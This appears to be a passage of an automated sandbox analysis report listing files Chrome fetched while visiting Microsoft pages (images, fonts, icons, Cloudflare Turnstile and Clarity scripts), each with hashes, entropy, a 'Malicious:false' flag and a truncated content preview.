                                                                                                                                    Preview:<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4519)">.<path d="M19.25 11H22V13.0518C22 13.46 21.932 13.8503 21.7959 14.2227C21.6598 14.5951 21.4665 14.9352 21.2158 15.2432C20.9652 15.5511 20.6715 15.8053 20.335 16.0059C19.9984 16.2064 19.6224 16.346 19.207 16.4248L19.2178 16.1562C19.1748 16.5286 19.0781 16.8796 18.9277 17.209C18.7773 17.5384 18.584 17.8392 18.3477 18.1113C18.1113 18.3835 17.8356 18.6126 17.5205 18.7988C17.2054 18.985 16.8652 19.1139 16.5 19.1855V20.625H19.25V22H12.375V20.625H15.125V19.1855C14.7598 19.1139 14.4196 18.985 14.1045 18.7988C13.7894 18.6126 13.5137 18.387 13.2773 18.1221C13.041 17.8571 12.8477 17.5563 12.6973 17.2197C12.5469 16.8831 12.4502 16.5286 12.4072 16.1562L12.418 16.4248C12.0098 16.3389 11.6374 16.1921 11.3008 15.9844C10.9642 15.7767 10.6706 15.526 10.4199 15.2324C10.1693 14.9388 9.97591 14.6094 9.83984 14.2441C9.70378 13.8789 9.63216 13.4814 9.625 13.0518V11H12.375V9.625
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (47691)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):47692
                                                                                                                                    Entropy (8bit):5.4016459163756165
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                    SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                    SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                    SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1010x433, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):122668
                                                                                                                                    Entropy (8bit):7.9982735760129735
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:9992325327E774D65D9EDD539CFE83E8
                                                                                                                                    SHA1:5EA82269D4C8A61ACD4B9D6EB480F8ADECAE2993
                                                                                                                                    SHA-256:FF6D32DD375B45A565ECECB1FC28DCCD9422CA7685D604E403330B53DF58A16F
                                                                                                                                    SHA-512:A72F2F11E035C807E69E01F2CCAF6773B17CE647BE89210CB6AD0470E5168E37D41DD3BD8B6EC347278F4776655EB7E5BEA082BD15CEA5B0AD0A1D6086A0A6C4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF$...WEBPVP8 ....Pa...*....>...A.../...a,........._4......9O...~.......l?......o.....o._F...+...G....................?............g.o.._I..~..............?.?....U...O........1.........?.7......>.:?.{........S.?......1..?..........'._..........k......?.....................?....]............?....{.?.#......'?.~dy..?.....o..._....y.O.....?p.......o..;.>./.7.../.O..........;...O.?/<Iw?.....{.{......?q.....0....._..r...o.o......._...............N.....w.G...W.................._.....s....?.?...._...g.......?..........O...>...{.........g...u...5.......^.<..r-..x....;#..]8..hH.m..y.Z.......D.Q).. 3.~,O.:P&...G.<.E..^...7F...{....R.x.1+.L.{..3.~-.~..:.V.*6.....-.s.....G..:.<0.+!u9D...f...^.....N.........oAc.e%.....6._.t...0.....5.Lk.'.L..>.W...LL(.....(...........c"...r].-.}p.....}Uc...w..e..:..A.LQ.....?.#-1..j..7pA..t\...m+....*5.e....iz..t....QU.l..;...1....!sv..#....:H2......t[...z|izN...zH...Ojd....]:.t...q..0..E.'..W2{.....".......a.@X7.0~.~
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1340
                                                                                                                                    Entropy (8bit):5.340331154152696
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5984947DF59FE0699EADBAFB42861404
                                                                                                                                    SHA1:9AEAF7DBC1C6774D7F5FD19EBB001C824C03E7B3
                                                                                                                                    SHA-256:0B3C5E550FD754CFBD4BDCA1185A108309C1FD3B7ABEED8A012BD38F27C71A25
                                                                                                                                    SHA-512:3290C21145AF2306920E4590FDCEB98F86CE47472AA6070FAB4438B7FFD99B1D545E2403946A3130CDC253B0C96A065C794A8063E5A59B4C0E34C5D6A3F25631
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:<svg width="116" height="183" viewBox="0 0 116 183" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M115.525 0V175.78H64.9211V0H115.525Z" fill="url(#paint0_linear_2793_6730)"/>.<path opacity="0.25" d="M83.3227 54.0154V178.526H32.719V46.6914H77.1891C80.5768 46.6914 83.3227 49.9708 83.3227 54.0154Z" fill="black" stroke="black" stroke-opacity="0.5" stroke-width="7.33797"/>.<path d="M83.3227 51.2689V175.78H32.719V43.9449H77.1891C80.5768 43.9449 83.3227 47.2243 83.3227 51.2689Z" fill="url(#paint1_linear_2793_6730)"/>.<path d="M0.516846 87.89V175.78H51.1206V95.214C51.1206 91.1694 48.3742 87.89 44.9865 87.89H0.516846Z" fill="url(#paint2_linear_2793_6730)"/>.<defs>.<linearGradient id="paint0_linear_2793_6730" x1="56.4873" y1="1.08736e-06" x2="140.728" y2="154.216" gradientUnits="userSpaceOnUse">.<stop stop-color="#E6AD10"/>.<stop offset="1" stop-color="#C87E0E"/>.</linearGradient>.<linearGradient id="paint1_linear_2793_6730" x1="32.7149" y1="43.9449" x2="102.931" y2="161.553" gradient
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x724, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):9846
                                                                                                                                    Entropy (8bit):7.947599117819747
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:6A12DE98860437C777D82BBC867BEF9E
                                                                                                                                    SHA1:05EFB81F5B376B84740B7EEC8F62CE923BAD6D0C
                                                                                                                                    SHA-256:761F8DBB35A3DA2D008D744293BA1ADAF00FF115D72BCAE6E335F9C60FFBAC2E
                                                                                                                                    SHA-512:16C8E759E36B29C7AC94BF0F689B145935B886725A54611D53C961D23911D80DF8CFE2BE6D4F49C57F3DAC2F79CDCF3701A5B0F1C5F00C174B6FD77994193B5B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFFn&..WEBPVP8 b&......*@...>...B!.....a--..5..W~...:.......u;..m.?...s......... ..?..^|...]..........=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.k.o{...'!.NC.l....9.}.r..d.=...{...'!....(.dR.k...{...'!.NC.l....9.}.r..d.=...{...&$Pg....'!.NC.l....9.}.r..d.=...{...'!......Y..].@.]..%C...{...'!.NC.l....9....N.L|...t.....u.`.:.Ol....6...Y.. .J.d.^.NC.l....9.}.r..d.=..(......G.....))iP,.j..F.01..XuXF...9.}.r..d.=...{...{d.8..=...{...QY...> xxq.b..s.<C?!....yrr..d.=...{...'!..&Vj{d.=...{.V../V .J]..".;.14./Bq........T.%..rr..d.=...{...5.YV..{...'!._3..N..j.}....C.......l....9.}.r..d.|...o.NC.l...Q.'";.?..M.....w.. .4..+../.....,......{...'!.N?.{.]....._K......(.............q....g.5D.2r@;|4.o.....x.9.}.r..d.|...m..).]..l.iP,.)IKJ/.uc....O...B(.3..A)3j$.@-7!.NC.l....9.Z..N....\.....'!.8.yD.|..T.B#...gQ$!(b..:...`.....Y.........89s/...}..NC.l.......Q|.h%#....k..".J.p._.J."@.8
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1010x433, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):84636
                                                                                                                                    Entropy (8bit):7.9974374657951826
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:3C4FB0462469EB2145FD6C96EB977652
                                                                                                                                    SHA1:3CCBB5A2168CA9C9D14DD9408D76A3795FA85D4F
                                                                                                                                    SHA-256:DFA3FC241EF8D5F892568411D75E9F7AA8E33BF30633A0EF1E1817F293AC342B
                                                                                                                                    SHA-512:B9E50989D57B63532DB478667F0D150F06F2D06D5EA6D15077BFE6FC798446E2BD2200EC2281598D4AA26639561BDA54D87ADB4D9C6C93440B098C1D0BD7B0C6
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF.J..WEBPVP8 .J..P[...*....>...A...L.....Y.....@.!.%7.#y..e..;.K....h._.?..]...~.........v...s..Q.....?...|.m.s....._.?.............?....y}.~......s./._...?'..................................o............#.?.O..............'._....._..2...........c.?.O................?....@..........................?......M...?....y...w./........_..F.O..._.....7..........".......?.......~I....._._._..`?{.a...t.s...'...._j...;.?......?.....w..................s......._.....{..Q...O........l.....m...w..t.S...a.......?.o.?......._.......>.?y..{.....".@..dG.4.......U...<.z.\z.,...\....fI3.=p.3.1........7~{........w..+....R...x.l..k.....{E..K...L.... v...z..#5...1..V.m*.>.mc...f.....l@..Hj.!W4B.hK........nv>....#..<K...p.+..%^.m...9...'.....<.q...F.Y."X}..9)...w...K.hr......9\...#........s.2k..^..F.5L...Q?...!.Q.....G.e......:`..U.96u.am.......f+..]..<^......H.F,.#o...;.e.=.t.f.K.......&JppF86.)......;....4..7.S.Dt0..I..!....j.'.z..tM.O..x..H...m.>..[.1.1......*."G
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):126701
                                                                                                                                    Entropy (8bit):7.998099194477281
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:118EBDCB80DACDFA81C087A629437D90
                                                                                                                                    SHA1:494DE78A23AD3A0C73B3029159209699F30E4274
                                                                                                                                    SHA-256:6827D4A19961773F70CFBFB46B047CCF5945A9CBB7368F0D7014FC071DD32EEB
                                                                                                                                    SHA-512:72B3E70ABA828C37C41C647CDE6CCDB55938A98198EECECBCEFCCE9A7D66FDEDB782E3793A8EB17533B3971D4C38B9FFC2033CF8DC1969500D4109449CE3170C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/hero%20bg-1600X582?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=582&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@...F....pixi............av1C........colrnclx...........ipma...................mdat.....jq.......2...D.........4.W=*.[jJ3".V3y.A........\.dI.#..w=.v....mZ...9.WY...e.9..+R..m...=q.Z..sE....d ?.+.;7........;.5._..o.........I..O...`.}.$|..].mp"..Z.]3.\{.......S:....E..%M......k...#..d.;a..y%#........#Oi..=Q..`.D..L..r....@..G.b..=...).V...........`.u".M.2.Og..1..lgM1H.0..j...G..@...J/.y*8m..'.U....9..y..q...'h.GV........8.p../....t.....2bx..@%8`........{..-.s^...Ds.t0nB.r.....TS......rE+A.8.O..Rk..K.....O..g...O..D~.}..ku.......K...m<#....}..,;@/RP.d$.t....+K&....._.<......v...2.I.x.S.u.>b...B..xs..T.y[.....u...........LDJd.E[..(....x.......Ux....{+=F2...:..v....j(.nn...'.B....._..~Q.jQ...E...?....#8.....'Q...y..X\..N.&BFRD.-I.C...u.l.tc.B.....)j...:c5C
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1583
                                                                                                                                    Entropy (8bit):4.041589377749132
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:29E9B36995DBCDDFEE5BCFC013C2E695
                                                                                                                                    SHA1:A7A7A240495116E98296BBA513DAD863C7748EC6
                                                                                                                                    SHA-256:97F584E82B7B6C7A96DA0B8C0D2211B5DD550E5F731621FC57E7A6DC03D0C3CA
                                                                                                                                    SHA-512:88CA3C8F04DEBB8FEA817A93E4F3E4374297865D1AE22B086503228FF3BDABB284CD41BC7CFC98A4EBDE65B366AFABA233D384A45135B338DEDC93101E95E877
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4 6C4 5.30945 4.3153 4.70664 4.77423 4.22025C5.2294 3.73784 5.85301 3.33745 6.56668 3.01752C7.99575 2.3769 9.91738 2 12 2C14.0826 2 16.0042 2.3769 17.4333 3.01752C18.147 3.33745 18.7706 3.73784 19.2258 4.22025C19.6847 4.70664 20 5.30945 20 6V18C20 18.6906 19.6847 19.2934 19.2258 19.7798C18.7706 20.2622 18.147 20.6626 17.4333 20.9825C16.0042 21.6231 14.0826 22 12 22C9.91738 22 7.99575 21.6231 6.56668 20.9825C5.85301 20.6626 5.2294 20.2622 4.77423 19.7798C4.3153 19.2934 4 18.6906 4 18V6ZM5.5 6C5.5 6.20691 5.59044 6.45909 5.86525 6.75034C6.14382 7.04559 6.58195 7.3455 7.18027 7.61372C8.37519 8.14937 10.0786 8.5 12 8.5C13.9214 8.5 15.6248 8.14937 16.8197 7.61372C17.418 7.3455 17.8562 7.04559 18.1348 6.75034C18.4096 6.45909 18.5 6.20691 18.5 6C18.5 5.79309 18.4096 5.54091 18.1348 5.24966C17.8562 4.95441 17.418 4.65449 16.8197 4.38628C15.6248 3.85063 13.9214 3.5 12 3.5C10.0786 3.5 8.3751
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 27652, version 1.28835
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):27652
                                                                                                                                    Entropy (8bit):7.991828773312673
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:CA021CCD30AC383F134C6F4C6C9B905D
                                                                                                                                    SHA1:5397761812C54A8EDED0773843E3E01AE087BD8A
                                                                                                                                    SHA-256:175046E68FF8F49A59D8C9D3AA079BED92C6BBE9F17F311D298AE929FC87DFE5
                                                                                                                                    SHA-512:C7E661BB905587962A82D9A275346CD67A146112F069F0FD69C1517E9FA36AD1B32C6DF2F701E1F8900D7736A94C44011290BED7DCFE12603934C45866848553
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/resources/fonts/MWFFluentIcons.woff2
                                                                                                                                    Preview:wOF2......l...........k...p........................`..F......e.6.$..(..V.. .......r...6-.w;.N..3#(i...@...........$.c....Q>....H.F!...I.....wKB..8....p.5...j.q..U.B......aG.s./&.7~........v6.-e..G..;%.=%..(..[Ii.......8x.7\.../.v.@......a/..EOx...:.....h.T>..p.0..M.p.!..R(-!.lH!.QZHB.d.N..Pjh=4.gU..Q..`....h'.+.w.O.;.^.,..?....J.v.{Qy+..~.d..z......]c..N.|.....2....-...[.-.b...?GP9...T.=.Y..d....A.$...!..M+.........t..{W...C.^..1....`Y`....&..&.=..fH...nmV.9pl.....A.:8...$u.......u..T-.'...H.........a.2....KWX. . ....#.Q)5.Q!.~.g...,?.....0..g.Z..:.Y..s...{G.......`.C.V../^x)........7..*n..RJ.e....@R..8.....m4.+.G...o.M.l.RT..p....R..9.U,.f..13.ID.`.D..2K.;3..... .KB..3.t..+....9:...su...>W.].t.R..+].)._..&..IS..1fg..\...M...._..W(..aCtIa...-*K3.....p..f.L..R.n.5..X2&.g.~..m.o..s*m...Y.M..C...X..o..QQp........7..9.....$.H.....0..c.V.Z,..0..'.s..%..`.E.|........4`hC..`N..f...@....U./H$h{..[.>...Y....h..{.#=.1-.E ......#$..D...=...N..|...P.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):836
                                                                                                                                    Entropy (8bit):6.944112371702667
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A4D31E77D95CABD70E5D88128E03F114
                                                                                                                                    SHA1:AA682837F93B9956F81C387EC850EDA852ACE98B
                                                                                                                                    SHA-256:214A848E042AAE43FFF9C74154FCE5331503F71DB2FC430C62C027C3F93B3311
                                                                                                                                    SHA-512:52F589A222AB40F0A8F5CAF8AA8F90CA371E67BB6AA2E17C36B8103EDB1232218AB6357ACA8C26D09BB6D706CA515EAC58197BE82E7286C58EDC24BB256E1011
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_FB?scl=1
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................*...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................2mdat........h...B2......Q...:w...L?....F2.9c......e.n[...X..A..Aa.?..2.._.y.8.h....n....4..........~.i....j...}r....lD...O......_.g..L....b..r.W$WR.3.nBe..(...".....a.a./..B......#.N..P^..[D...(5.z..;#E.X..*..1..Tb.GT2.{P^........o........G7....^i.|..".Kx..e)-.MK....u{.y..?.U..p...I$...t/_.[.x.P.3.2..t..:.ii$P.I.../...qV.VBt.....x.wLZe.g...0R.0.K'.H~..o....,Y6.A6N.-I?.b...y.yL.!..ba..\|X!u...&...g......3.....N...oI...Q..E.....<.*%...0.......a..<...f..c.p..i.F.....J. ..:,....4.r.Qa...P/.=.].UV!4.e1..Tu.?.....R..H..+NX.#i...28.4QY..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3116
                                                                                                                                    Entropy (8bit):4.431505373285771
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                                                                                    SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                    SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                    SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-localstorage.min.ACSHASHb884ef4864d6867bd00aa4a7a5cfb368.js
                                                                                                                                    Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):17174
                                                                                                                                    Entropy (8bit):2.9129715116732746
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/favicon.ico?v2
                                                                                                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):465365
                                                                                                                                    Entropy (8bit):7.999450991558627
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:33EB0F71F56DAFD6860F05BDA71A5467
                                                                                                                                    SHA1:CDE2905341E8B09386766A8D81D7E82E348EABEA
                                                                                                                                    SHA-256:4AA8E6DF938BD8F79C14BB78E37C71B3EE2B005F2D6129551351483D4CB00DF8
                                                                                                                                    SHA-512:06523FBF98109DA17132279D8470AE9E592D5BAA379555933A2583C36468ADF983929318D56E6C3E8900280A2918A78A1A699C0BC1832CF8026CCF4B3D0EAEE0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Accordian-03-593X334?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2998&hei=1689&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..............................%...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................(mdat........Lp.2.....$@..R.~...cL.0,.A.'y.PV....H.(..B..VL..[../u.+'E*.~c.}.:;../....2..z....0.^DA.&...V...k.f%....y|...S.....7?./.*)..sY+...A.@BU...i'R..B..bH[.|p..+....d...yR.6.eI.....4.7....3.|.B...o..~..).....s............z..Hzg.X.U..X..o....V..7Z.....]X....H.....4..o_.B.......F.*@........Lp@CA.2..D......< t....>.......Q...?.(7._.>FW...y.X......BJu...3K'z....yfK..w..P....W.]..w..\W!..^.[K....Q0.?(Q..X7...Z..P..H..oB:.;.N..`d=&....s..^kd.j..r.wW..jZT..p..3.&......<s....Wn.DQ...w6.....=?...i.B.DBr8.f.%2.....$.....Rw...7].#.l.^f........
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x758, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):17952
                                                                                                                                    Entropy (8bit):7.968896931169015
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:62AB961B5F2C83C97F651B39CCCD3EE5
                                                                                                                                    SHA1:8B49B5C50058960B9E22B5FB11A45734FB652623
                                                                                                                                    SHA-256:48B10FF781D30DB4EFEAA14E432A9D7E17DCCA26A98A12204A63E62879297E0C
                                                                                                                                    SHA-512:958BDF5B3D1B404D298461817C771B901EE482895B7A8AAF5A8994AE9F02174CD33112E55A30F95DA6E4660372181C0DF153869572814BB30BADF97091A3A2EB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF.F..WEBPVP8 .F.../...*@...>...B!..7...a--..5../..B..i...loD.+......;...w.....].7./...p.../..f......./....s..{<.................[..._..............k..........~............g.....;.......O.... ......=O..........>....G...@.v,....1?....1..};.....'.....z....#.....p..../.l .68....Btou...M..=.....L-t..CYz.K.......r.C.|[.._$.w...Oi...y.:.%...XPkWL...#z[y...Yk.^V.,.O.........F.......Db.V...L....MP...fdFz...LzaluB...dC.2"7.....;.:..|B.h.f.(.....`..I~c.@/`...."..>\._L...w.D....U.i..Wy..&A.H.;+.m.;3U..R..;.*.(vf...o.....CPl.CC.BT..*..:.Fupj&(f...nw+LZ"....[....pB.+&...qb_..M.!..6.U{e.8...K......xgH=+.Y.>D.o6....IN...L.V\3..F..fX.z.>9.0.....W*.M..T..R.......M....}...w.W...c..y.e...tOK(......~..&....zk.i_.7Q...{....W@Gi..|O..5....y.....l:.3...$. ..`......y..g.}z.LP.{.'{..xa6.x......$.3....eI..E..`q3..-..k.}..8bk>..-......?..*l.Hs......t.............A.X..f..U..J.m.lp...Z.6,.f.nC,.1......F."....M.*.un.2}.r....}....a.p.t[....R..RV..W...18.Fo.%L.."i.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):68544
                                                                                                                                    Entropy (8bit):5.353273780967634
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A07833512D877DC182973CF42CDA7D79
                                                                                                                                    SHA1:28DCFE97957BBB239FCE68DBF64BB22338ABE500
                                                                                                                                    SHA-256:83146C62110F911CBC9E66DAA824D1F4E1D8F8AA6508AA45FE061932DB65FA27
                                                                                                                                    SHA-512:3656CCE575FC835853AA0B0F4AAF38D65DD3E4CA5985E1E64A9C211F6D5350A640D4AC48EE90507F7C3657E804DB9CB6DBB6A80B4475C12FF658C75CF4EB29AF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.clarity.ms/s/0.7.59/clarity.js
                                                                                                                                    Preview:/* clarity-js v0.7.59: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return br},get start(){return yr},get stop(){return wr},get track(){return hr}}),e=Object.freeze({__proto__:null,get clone(){return Xr},get compute(){return Yr},get data(){return jr},get keys(){return Ar},get reset(){return qr},get start(){return Hr},get stop(){return Fr},get trigger(){return Wr},get update(){return Ur}}),n=Object.freeze({__proto__:null,get check(){return Zr},get compute(){return $r},get data(){return Dr},get start(){return Kr},get stop(){return ti},get trigger(){return Qr}}),a=Object.freeze({__proto__:null,get compute(){return ui},get data(){return ei},get log(){return oi},get reset(){return ci},get start(){return ri},get stop(){return ii},get updates(){return ni}}),r=Object.freeze({__proto__:null,get callback(){return wi},get callbacks(){return di},get clear(){return bi},get consent(){return yi},get data(){return li},
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
